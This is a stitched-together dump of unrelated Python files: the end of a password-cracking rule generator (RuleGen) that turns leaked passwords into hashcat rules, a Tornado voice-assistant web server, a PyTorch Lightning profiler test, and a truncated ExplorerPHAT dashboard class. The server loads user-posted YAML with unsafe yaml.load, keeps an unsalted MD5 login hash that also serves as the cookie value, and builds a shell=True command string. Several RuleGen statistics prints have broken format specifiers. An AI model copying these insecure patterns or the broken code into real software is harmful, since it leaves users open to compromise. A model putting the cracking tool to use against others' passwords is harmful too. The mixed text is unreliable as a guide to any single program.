# Capitalize the first letter
elif p == 0 and self.generate_simple_hashcat_rules(
self.hashcat_rule["c"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("c")
word_rules = self.hashcat_rule["c"](word_rules)
# Toggle the case of characters at position N
else:
hashcat_rules.append(f"T{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["T"](word_rules, p)
# Case Toggle: Lowercased a letter
elif word_rules[p].isupper() and word_rules[p].lower() == password[p]:
# Toggle the case of all characters in word (mixed cases)
if (
password_upper
and password_lower
and self.generate_simple_hashcat_rules(
self.hashcat_rule["t"](word_rules), rules[i + 1 :], password
)
):
hashcat_rules.append("t")
word_rules = self.hashcat_rule["t"](word_rules)
# Lowercase all letters
elif self.generate_simple_hashcat_rules(
self.hashcat_rule["l"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("l")
word_rules = self.hashcat_rule["l"](word_rules)
# Lowercase the first found character, uppercase the rest
elif p == 0 and self.generate_simple_hashcat_rules(
self.hashcat_rule["C"](word_rules), rules[i + 1 :], password
):
hashcat_rules.append("C")
word_rules = self.hashcat_rule["C"](word_rules)
# Toggle the case of characters at position N
else:
hashcat_rules.append(f"T{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["T"](word_rules, p)
# Special case substitution of 'all' instances (1337 $p34k)
elif (
word_rules[p].isalpha()
and not password[p].isalpha()
and self.generate_simple_hashcat_rules(
self.hashcat_rule["s"](word_rules, word_rules[p], password[p]),
rules[i + 1 :],
password,
)
):
# If we have already detected this rule, then skip it thus
# reducing total rule count.
# BUG: Elisabeth => sE3 sl1 u o3Z sE3 => 31IZAB3TH
# if not "s%s%s" % (word_rules[p],password[p]) in
# hashcat_rules:
hashcat_rules.append(f"s{word_rules[p]}{password[p]}")
word_rules = self.hashcat_rule["s"](
word_rules, word_rules[p], password[p]
)
# Replace next character with current
elif (
p < len(password) - 1
and p < len(word_rules) - 1
and password[p] == password[p + 1]
and password[p] == word_rules[p + 1]
):
hashcat_rules.append(f".{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["."](word_rules, p)
# Replace previous character with current
elif (
p > 0
and w > 0
and password[p] == password[p - 1]
and password[p] == word_rules[p - 1]
):
hashcat_rules.append(f",{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule[","](word_rules, p)
# ASCII increment
elif ord(word_rules[p]) + 1 == ord(password[p]):
hashcat_rules.append(f"+{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["+"](word_rules, p)
# ASCII decrement
elif ord(word_rules[p]) - 1 == ord(password[p]):
hashcat_rules.append(f"-{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["-"](word_rules, p)
# SHIFT left
elif ord(word_rules[p]) << 1 == ord(password[p]):
hashcat_rules.append(f"L{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["L"](word_rules, p)
# SHIFT right
elif ord(word_rules[p]) >> 1 == ord(password[p]):
hashcat_rules.append(f"R{self.int_to_hashcat(p)}")
word_rules = self.hashcat_rule["R"](word_rules, p)
# Position based replacements.
else:
hashcat_rules.append(f"o{self.int_to_hashcat(p)}{password[p]}")
word_rules = self.hashcat_rule["o"](word_rules, p, password[p])
if self.debug:
print(
f"\t[*] Advanced Processing Ended: "
f"{word_rules} {' '.join(hashcat_rules)}"
)
#######################################################################
# Prefix rules
last_prefix = 0
prefix_rules = list()
for hashcat_rule in hashcat_rules:
if (
hashcat_rule[0] == "i"
and self.hashcat_to_int(hashcat_rule[1]) == last_prefix
):
prefix_rules.append(f"^{hashcat_rule[2]}")
last_prefix += 1
elif len(prefix_rules):
hashcat_rules = prefix_rules[::-1] + hashcat_rules[len(prefix_rules) :]
break
else:
break
else:
hashcat_rules = prefix_rules[::-1] + hashcat_rules[len(prefix_rules) :]
####################################################################
# Appendix rules
last_appendix = len(password) - 1
appendix_rules = list()
for hashcat_rule in hashcat_rules[::-1]:
if (
hashcat_rule[0] == "i"
and self.hashcat_to_int(hashcat_rule[1]) == last_appendix
):
appendix_rules.append(f"${hashcat_rule[2]}")
last_appendix -= 1
elif len(appendix_rules):
hashcat_rules = (
hashcat_rules[: -len(appendix_rules)] + appendix_rules[::-1]
)
break
else:
break
else:
hashcat_rules = hashcat_rules[: -len(appendix_rules)] + appendix_rules[::-1]
####################################################################
# Truncate left rules
last_precut = 0
precut_rules = list()
for hashcat_rule in hashcat_rules:
if (
hashcat_rule[0] == "D"
and self.hashcat_to_int(hashcat_rule[1]) == last_precut
):
precut_rules.append("[")
elif len(precut_rules):
hashcat_rules = precut_rules[::-1] + hashcat_rules[len(precut_rules) :]
break
else:
break
else:
hashcat_rules = precut_rules[::-1] + hashcat_rules[len(precut_rules) :]
####################################################################
# Truncate right rules
last_postcut = len(password)
postcut_rules = list()
for hashcat_rule in hashcat_rules[::-1]:
if (
hashcat_rule[0] == "D"
and self.hashcat_to_int(hashcat_rule[1]) >= last_postcut
):
postcut_rules.append("]")
elif len(postcut_rules):
hashcat_rules = (
hashcat_rules[: -len(postcut_rules)] + postcut_rules[::-1]
)
break
else:
break
else:
hashcat_rules = hashcat_rules[: -len(postcut_rules)] + postcut_rules[::-1]
# Check if rules result in the correct password
if word_rules == password:
return hashcat_rules
else:
if self.debug:
print(
f"[!] Advanced Processing FAILED: "
f"{word} => {' '.join(hashcat_rules)} => {password} ({word_rules})"
)
return None
def check_reversible_password(self, password):
""" Check whether the password is likely to be reversed successfuly. """
# Skip all numeric passwords
if password.isdigit():
if self.verbose and not self.quiet:
print(f"[!] {password} => {{skipping numeric}} => {password}")
self.numeric_stats_total += 1
return False
# Skip passwords with less than 25% of alpha character
# TODO: Make random word detection more reliable based on word entropy.
elif len([c for c in password if c.isalpha()]) < len(password) // 4:
if self.verbose and not self.quiet:
print(
f"[!] {password} => {{skipping alpha less than 25%}} => {password}"
)
self.special_stats_total += 1
return False
# Only check english ascii passwords for now
# TODO: Add support for more languages.
elif [c for c in password if ord(c) < 32 or ord(c) > 126]:
if self.verbose and not self.quiet:
print(f"[!] {password} => {{skipping non ascii english}} => {password}")
self.foreign_stats_total += 1
return False
else:
return True
def analyze_password(
self,
password,
rules_queue=multiprocessing.Queue(),
words_queue=multiprocessing.Queue(),
):
""" Analyze a single password. """
if self.verbose:
print(f"[*] Analyzing password: {password}")
words = []
# Short-cut words in the dictionary
if self.enchant.check(password) and not self.word:
word = dict()
word["password"] = password
word["suggestion"] = password
word["hashcat_rules"] = [[]]
word["pre_rule"] = []
word["best_rule_length"] = 9999
words.append(word)
# Generate rules for words not in the dictionary
else:
# Generate source words list
words = self.generate_words(password)
# Generate levenshtein reverse paths for each suggestion
for word in words:
# Generate a collection of hashcat_rules lists
word["hashcat_rules"] = self.generate_hashcat_rules(
word["suggestion"], word["password"]
)
self.print_hashcat_rules(words, password, rules_queue, words_queue)
def print_hashcat_rules(self, words, password, rules_queue, words_queue):
best_found_rule_length = 9999
# Sorted list based on rule length
for word in sorted(words, key=lambda w: len(w["hashcat_rules"][0])):
words_queue.put(word["suggestion"])
for hashcat_rule in word["hashcat_rules"]:
rule_length = len(hashcat_rule)
if not self.more_rules:
if rule_length < best_found_rule_length:
best_found_rule_length = rule_length
elif rule_length > best_found_rule_length:
if self.verbose:
print(
f"[-] {word['suggestion']} => "
f"{{best rule length exceeded: {rule_length} "
f"({best_found_rule_length})}} => {password}"
)
break
if rule_length <= self.max_rule_len:
hashcat_rule_str = " ".join(
hashcat_rule + word["pre_rule"] or [":"]
)
if self.verbose:
print(
f"[+] {word['suggestion']} => {hashcat_rule_str} => {password}"
)
rules_queue.put(hashcat_rule_str)
def password_worker(self, i, passwords_queue, rules_queue, words_queue):
if self.debug:
print(f"[*] Password analysis worker [{int(i)}] started.")
try:
while True:
password = passwords_queue.get()
# Interrupted by a Death Pill
if password is None:
break
self.analyze_password(password, rules_queue, words_queue)
except (KeyboardInterrupt, SystemExit):
if self.debug:
print(f"[*] Password analysis worker [{int(i)}] terminated.")
if self.debug:
print(f"[*] Password analysis worker [{int(i)}] stopped.")
def rule_worker(self, rules_queue, output_rules_filename):
""" Worker to store generated rules. """
print(f"[*] Saving rules to {output_rules_filename}")
f = open(output_rules_filename, "w")
if self.debug:
print("[*] Rule worker started.")
try:
while True:
rule = rules_queue.get()
# Interrupted by a Death Pill
if rule is None:
break
f.write(f"{rule}\n")
f.flush()
except (KeyboardInterrupt, SystemExit):
if self.debug:
print("[*] Rule worker terminated.")
f.close()
if self.debug:
print("[*] Rule worker stopped.")
def word_worker(self, words_queue, output_words_filename):
""" Worker to store generated rules. """
print(f"[*] Saving words to {output_words_filename}")
f = open(output_words_filename, "w")
if self.debug:
print("[*] Word worker started.")
try:
while True:
word = words_queue.get()
# Interrupted by a Death Pill
if word is None:
break
f.write(f"{word}\n")
f.flush()
except (KeyboardInterrupt, SystemExit):
if self.debug:
print("[*] Word worker terminated.")
f.close()
if self.debug:
print("[*] Word worker stopped.")
# Analyze passwords file
def analyze_passwords_file(self, passwords_file):
""" Analyze provided passwords file. """
print(f"[*] Analyzing passwords file: {passwords_file} ...")
print("[*] Press Ctrl-C to end execution and generate statistical analysis.")
# Setup queues
passwords_queue = multiprocessing.Queue(self.threads)
rules_queue = multiprocessing.Queue()
words_queue = multiprocessing.Queue()
# Start workers
for i in range(self.threads):
multiprocessing.Process(
target=self.password_worker,
args=(i, passwords_queue, rules_queue, words_queue),
).start()
multiprocessing.Process(
target=self.rule_worker, args=(rules_queue, f"{self.basename}.rule")
).start()
multiprocessing.Process(
target=self.word_worker, args=(words_queue, f"{self.basename}.word")
).start()
# Continue with the main thread
f = open(passwords_file, "r", encoding="latin-1", errors="ignore")
password_count = 0
analysis_start = time.time()
try:
for password in tqdm(f):
if self.verbose is True:
tqdm.disable = True
password = password.rstrip("\r\n")
if len(password) > 0:
# Provide analysis time feedback to the user
if (
not self.quiet
and password_count != 0
and password_count % 5000 == 0
):
print(
f"[-] Skipped {password_count} all numeric passwords "
f"({float(self.numeric_stats_total) * 100.0 / float(password_count):.2f}%) "
)
password_count += 1
# Perform preliminary checks and add password to the queue
if self.check_reversible_password(password):
passwords_queue.put(password)
except (KeyboardInterrupt, SystemExit):
print("\n[!] Rulegen was interrupted.")
else:
# Signal workers to stop.
for _ in range(self.threads):
passwords_queue.put(None)
# Wait for all of the queued passwords to finish.
while not passwords_queue.empty():
time.sleep(1)
# Signal writers to stop.
rules_queue.put(None)
words_queue.put(None)
f.close()
analysis_time = time.time() - analysis_start
print(
f"[*] Finished processing {int(password_count)} passwords in "
f"{analysis_time:.2f} seconds at the rate of "
f"{(float(password_count) / analysis_time):.2f} p/sec"
)
print(f"[*] Generating statistics for [{self.basename}] rules and words.")
print(
f"[-] Skipped {self.numeric_stats_total} all numeric passwords "
f"(({float(self.numeric_stats_total) * 100.0 / float(password_count)}):.2f%)"
)
print(
f"[-] Skipped {self.special_stats_total} passwords with less than 25%"
f" alpha characters ({float(self.special_stats_total) * 100.0 / float(password_count)}:.2f%)"
)
print(
f"[-] Skipped {self.foreign_stats_total} passwords with non ascii "
f"characters ({float(self.foreign_stats_total) * 100.0 / float(password_count)}:.2f%)"
)
# TODO: Counter breaks on large files. uniq -c | sort -rn is still the most
# optimal way.
rules_file = open(f"{self.basename}.rule", "r")
rules_sorted_file = open(f"{self.basename}-sorted.rule", "w")
rules_counter = Counter(rules_file)
rule_counter_total = sum(rules_counter.values())
print("\n[*] Top 10 rules")
rules_i = 0
for (rule, count) in rules_counter.most_common():
rules_sorted_file.write(rule)
if rules_i < 10:
print(
f"[+] {rule.rstrip(NEWLINE)} - {count} "
f"({count * 100 / rule_counter_total}:.2f%)"
)
rules_i += 1
rules_file.close()
rules_sorted_file.close()
words_file = open(f"{self.basename}.word", "r")
words_sorted_file = open(f"{self.basename}-sorted.word", "w")
words_counter = Counter(words_file)
word_counter_total = sum(rules_counter.values())
print("\n[*] Top 10 words")
words_i = 0
for (word, count) in words_counter.most_common():
words_sorted_file.write(word)
if words_i < 10:
print(
f"[+] {word.rstrip(NEWLINE)} - "
f"{count} ({count * 100 / word_counter_total}:.2f%)"
)
words_i += 1
words_file.close()
words_sorted_file.close()
##########################################################################
def verify_hashcat_rules(self, word, rules, password):
f = open(f"{HASHCAT_PATH}/test.rule", "w")
f.write(" ".join(rules))
f.close()
f = open(f"{HASHCAT_PATH}/test.word", "w")
f.write(word)
f.close()
p = subprocess.Popen(
[
f"{HASHCAT_PATH}/hashcat-cli64.bin",
"-r",
f"{HASHCAT_PATH}/test.rule",
"--stdout",
f"{HASHCAT_PATH}/test.word",
],
stdout=subprocess.PIPE,
)
out, err = p.communicate()
out = out.strip()
if out == password:
hashcat_rules_str = " ".join(rules or [":"])
if self.verbose:
print(f"[+] {word} => {hashcat_rules_str} => {password}")
else:
print(
f"[!] Hashcat Verification FAILED: {word} => "
f"{' '.join(rules or [':'])} => {password} ({out})"
)
if __name__ == "__main__":
header = " _ \n"
header += f" RuleGen {VERSION} | |\n"
header += " _ __ __ _ ___| | _\n"
header += r" | '_ \ / _` |/ __| |/ /\n"
header += " | |_) | (_| | (__| < \n"
header += r" | .__/ \__,_|\___|_|\_\\\n"
header += " | | \n"
header += " |_| iphelix@thesprawl.org\n"
header += "\n"
parser = OptionParser("%prog [options] passwords.txt", version=f"%prog {VERSION}")
parser.add_option(
"-b",
"--basename",
help="Output base name. The following files will be generated: "
+ "basename.words, basename.rules and basename.stats",
default="analysis",
metavar="rockyou",
)
parser.add_option(
"-w",
"--wordlist",
help="Use a custom wordlist for rule analysis.",
metavar="wiki.dict",
)
parser.add_option(
"-q",
"--quiet",
action="store_true",
dest="quiet",
default=False,
help="Don't show headers.",
)
parser.add_option(
"--threads",
type="int",
default=multiprocessing.cpu_count(),
help="Parallel threads to use for processing.",
)
wordtune = OptionGroup(parser, "Fine tune source word generation:")
wordtune.add_option(
"--maxworddist",
help="Maximum word edit distance (Levenshtein)",
type="int",
default=10,
metavar="10",
)
wordtune.add_option(
"--maxwords",
help="Maximum number of source word candidates to consider",
type="int",
default=5,
metavar="5",
)
wordtune.add_option(
"--morewords",
help="Consider suboptimal source word candidates",
action="store_true",
default=False,
)
wordtune.add_option(
"--simplewords",
help="Generate simple source words for given passwords",
action="store_true",
default=False,
)
parser.add_option_group(wordtune)
ruletune = OptionGroup(parser, "Fine tune rule generation:")
ruletune.add_option(
"--maxrulelen",
help="Maximum number of operations in a single rule",
type="int",
default=10,
metavar="10",
)
ruletune.add_option(
"--maxrules",
help="Maximum number of rules to consider",
type="int",
default=5,
metavar="5",
)
ruletune.add_option(
"--morerules",
help="Generate suboptimal rules",
action="store_true",
default=False,
)
ruletune.add_option(
"--simplerules",
help="Generate simple rules insert,delete,replace",
action="store_true",
default=False,
)
ruletune.add_option(
"--bruterules",
help="Bruteforce reversal and rotation rules (slow)",
action="store_true",
default=False,
)
parser.add_option_group(ruletune)
spelltune = OptionGroup(parser, "Fine tune spell checker engine:")
spelltune.add_option(
"--providers",
help="Comma-separated list of provider engines",
default="aspell,myspell",
metavar="aspell,myspell",
)
spelltune.add_option(
"--language",
help="Language for spellchecker to use",
default="en",
metavar="en",
)
parser.add_option_group(spelltune)
debug = OptionGroup(parser, "Debuggin options:")
debug.add_option(
"-v",
"--verbose",
help="Show verbose information.",
action="store_true",
default=False,
)
debug.add_option(
"-d", "--debug", help="Debug rules.", action="store_true", default=False
)
debug.add_option(
"--password",
help="Process the last argument as a password not a file.",
action="store_true",
default=False,
)
debug.add_option(
"--word", help="Use a custom word for rule analysis", metavar="Password"
)
debug.add_option(
"--hashcat",
help="Test generated rules with hashcat-cli",
action="store_true",
default=False,
)
parser.add_option_group(debug)
(options, args) = parser.parse_args()
# Print program header
if not options.quiet:
print(header)
if len(args) < 1:
parser.error("no passwords file specified")
exit(1)
try:
rulegen = RuleGen(
language=options.language,
providers=options.providers,
basename=options.basename,
threads=options.threads,
)
except enchant.errors.DictNotFoundError:
print(
"[-] Cannot find a dictionary for specified language. "
"Please install it and try again."
)
print(
"[*] Hint: Usually this dictionary resides within an "
"aspell / myspell package."
)
exit(-1)
# Finetuning word generation
rulegen.max_word_dist = options.maxworddist
rulegen.max_words = options.maxwords
rulegen.more_words = options.morewords
rulegen.simple_words = options.simplewords
# Finetuning rule generation
rulegen.max_rule_len = options.maxrulelen
rulegen.max_rules = options.maxrules
rulegen.more_rules = options.morerules
rulegen.simple_rules = options.simplerules
rulegen.brute_rules = options.bruterules
if rulegen.brute_rules:
print("[!] Bruteforcing reversal and rotation rules. (slower)")
# Debugging options
rulegen.word = options.word
rulegen.verbose = options.verbose
rulegen.debug = options.debug
rulegen.hashcat = options.hashcat
rulegen.quiet = options.quiet
# Make multiprocessing use fork method instead of spawn
multiprocessing.set_start_method("fork", force=True)
# Custom language
print(f"[*] Using language: '{rulegen.enchant.tag}'")
# Custom wordlist
if not options.word:
if options.wordlist:
print(f"[*] Loading wordlist: {options.wordlist} ...")
rulegen.load_custom_wordlist(options.wordlist)
print(
f"[*] Using Enchant {rulegen.enchant.provider.name} module. "
"For best results please install"
)
print(f" '{rulegen.enchant.provider.name}' module language dictionaries.")
# Analyze a single password or several passwords in a file
if options.password:
rulegen.analyze_password(args[0])
else:
rulegen.analyze_passwords_file(args[0])
|
server.py
|
import os
import yaml
import json
import time
import base64
import random
import hashlib
import asyncio
import requests
import markdown
import threading
import subprocess
import tornado.web
import tornado.ioloop
import tornado.options
import tornado.httpserver
from tools import make_json, solr_tools
from robot import config, utils, logging, Updater, constants
logger = logging.getLogger(__name__)
conversation, wukong = None, None
commiting = False
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
if not self.get_secure_cookie('validation'):
return False
return str(self.get_secure_cookie("validation"), encoding='utf-8') == config.get('/server/validate', '')
def validate(self, validation):
if '"' in validation:
validation = validation.replace('"', '')
return validation == config.get('/server/validate', '') or validation == str(self.get_cookie('validation'))
class MainHandler(BaseHandler):
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch(wukong._dev)
suggestion = random.choice(suggestions)
notices = None
if 'notices' in info:
notices=info['notices']
self.render('index.html', update_info=info, suggestion=suggestion, notices=notices)
else:
self.render('index.html')
class MessageUpdatesHandler(BaseHandler):
"""Long-polling request for new messages.
Waits until new messages are available before returning anything.
"""
async def post(self):
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
cursor = self.get_argument("cursor", None)
messages = conversation.getHistory().get_messages_since(cursor)
while not messages:
# Save the Future returned here so we can cancel it in
# on_connection_close.
self.wait_future = conversation.getHistory().cond.wait()
try:
await self.wait_future
except asyncio.CancelledError:
return
messages = conversation.getHistory().get_messages_since(cursor)
if self.request.connection.stream.closed():
return
res = {'code': 0, 'message': 'ok', 'history': json.dumps(messages)}
self.write(json.dumps(res))
def on_connection_close(self):
self.wait_future.cancel()
class ChatHandler(BaseHandler):
def onResp(self, msg, audio, plugin):
logger.debug('response msg: {}'.format(msg))
res = {'code': 0, 'message': 'ok', 'resp': msg, 'audio': audio, 'plugin': plugin}
self.write(json.dumps(res))
def post(self):
global conversation
if self.validate(self.get_argument('validate', default=None)):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
if query == '':
res = {'code': 1, 'message': 'query text is empty'}
self.write(json.dumps(res))
else:
conversation.doResponse(query, uuid, onSay=lambda msg, audio, plugin: self.onResp(msg, audio, plugin))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile, onSay=lambda msg, audio, plugin: self.onResp(msg, audio, plugin))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class GetHistoryHandler(BaseHandler):
def get(self):
global conversation
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory().cache)}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
def get(self):
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(), 'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
def get(self):
if not self.validate(self.get_argument('validate', default=None)):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate', default=None)):
if self.get_argument('type') == 'restart':
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
if self.validate(self.get_argument('validate', default=None)):
configStr = self.get_argument('config')
try:
yaml.load(configStr)
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class QAHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(constants.getQAPath(), 'r') as f:
content = f.read()
self.render('qa.html', content=content)
def post(self):
if self.validate(self.get_argument('validate', default=None)):
qaStr = self.get_argument('qa')
qaJson = os.path.join(constants.TEMP_PATH, 'qa_json')
try:
make_json.convert(qaStr, qaJson)
solr_tools.clear_documents(config.get('/anyq/host', '0.0.0.0'),
'collection1',
config.get('/anyq/solr_port', '8900')
)
solr_tools.upload_documents(config.get('/anyq/host', '0.0.0.0'),
'collection1',
config.get('/anyq/solr_port', '8900'),
qaJson,
10
)
with open(constants.getQAPath(), 'w') as f:
f.write(qaStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except Exception as e:
logger.error(e)
res = {'code': 1, 'message': '提交失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class APIHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/api.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate', default=None)):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
print('success')
self.set_secure_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
def get(self):
if self.isValidated():
self.set_secure_cookie("validation", '')
self.redirect("/login")
settings = {
"cookie_secret": config.get('/server/cookie_secret', "__GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__"),
"template_path": os.path.join(constants.APP_PATH, "server/templates"),
"static_path": os.path.join(constants.APP_PATH, "server/static"),
"login_url": "/login",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/chat/updates", MessageUpdatesHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/qa", QAHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler),
(r"/photo/(.+\.(?:png|jpg|jpeg|bmp|gif|JPG|PNG|JPEG|BMP|GIF))", tornado.web.StaticFileHandler, {'path': config.get('/camera/dest_path', 'server/static')}),
(r"/audio/(.+\.(?:mp3|wav|pcm))", tornado.web.StaticFileHandler, {'path': constants.TEMP_PATH}),
(r'/static/(.*)', tornado.web.StaticFileHandler, {'path': 'server/static'})
], **settings)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical('服务器启动失败: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
|
test_xla_profiler.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from multiprocessing import Event, Process
import pytest
from pytorch_lightning import Trainer
from pytorch_lightning.profiler import XLAProfiler
from pytorch_lightning.utilities import _TPU_AVAILABLE
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
if _TPU_AVAILABLE:
import torch_xla.debug.profiler as xp
import torch_xla.utils.utils as xu
@RunIf(tpu=True)
def test_xla_profiler_instance(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True, profiler="xla", accelerator="tpu", devices=8)
assert isinstance(trainer.profiler, XLAProfiler)
trainer.fit(model)
assert trainer.state.finished, f"Training failed with {trainer.state}"
@pytest.mark.skipif(True, reason="XLA Profiler doesn't support Prog. capture yet")
def test_xla_profiler_prog_capture(tmpdir):
port = xu.get_free_tcp_ports()[0]
training_started = Event()
def train_worker():
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, max_epochs=4, profiler="xla", accelerator="tpu", devices=8)
trainer.fit(model)
p = Process(target=train_worker, daemon=True)
p.start()
training_started.wait(120)
logdir = str(tmpdir)
xp.trace(f"localhost:{port}", logdir, duration_ms=2000, num_tracing_attempts=5, delay_ms=1000)
p.terminate()
assert os.isfile(os.path.join(logdir, "plugins", "profile", "*", "*.xplane.pb"))
|
explorerphat.py
|
import time
from threading import Thread
from explorerphatdashboard.api.explorerphat.analog import Analog as ApiAnalog
from explorerphatdashboard.api.explorerphat.connection import Connection
from explorerphatdashboard.api.explorerphat.input import Input as ApiInput
from explorerphatdashboard.api.explorerphat.motor import Motor as ApiMotor
from explorerphatdashboard.api.explorerphat.output import Output as ApiOutput
from explorerphatdashboard.frames.views.connecting import Connecting as ConnectingView
from explorerphatdashboard.frames.views.disconnecting import Disconnecting as DisconnectingView
from explorerphatdashboard.frames.views.explorerphat import ExplorerPhat as ExplorerPhatView
from scriptcore.console.asciimatics.framelogic import FrameLogic
class ExplorerPhat(FrameLogic):
"""
The logic for the ExplorerPhatFrame
"""
def __init__(self, screen):
"""
Initiate the explorer phat frame
:param screen:
"""
super(ExplorerPhat, self).__init__(screen)
self._view = ExplorerPhatView(self._screen,
on_load=self._on_load,
on_output_toggle=self._on_output_toggle,
on_motor_min_click=self._on_motor_min_click,
on_motor_plus_click=self._on_motor_plus_click,
on_exit=self._on_exit)
self._connection = Connection.get_connection()
def get_view(self):
"""
Get the view
:return:
"""
return self._view
def _on_load(self):
"""
On load
:return:
"""
self._open_connection()
def _open_connection(self):
"""
Open connection
:return:
"""
connecting_view = ConnectingView(self._screen, on_cancel=lambda x: self._on_exit())
self._view.add_effect_to_scene(connecting_view)
def open_connection():
self._connection.open()
self._update_all_items()
connecting_view.close()
self._on_connected()
thread = Thread(target=open_connection)
thread.start()
def _on_connected(self):
"""
On connected
:return:
"""
self._start_auto_update()
def _start_auto_update(self):
"""
Start the auto update
:return:
"""
def update():
while self._connection.is_open():
